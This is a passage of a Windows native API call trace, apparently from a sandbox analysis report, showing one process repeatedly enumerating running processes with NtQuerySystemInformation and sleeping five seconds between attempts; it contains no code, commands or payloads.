ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.474] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.483] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.491] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.498] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.504] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.512] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.515] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.519] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.526] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.533] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.553] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.561] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.568] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.575] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.582] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.590] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.596] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.604] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.610] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 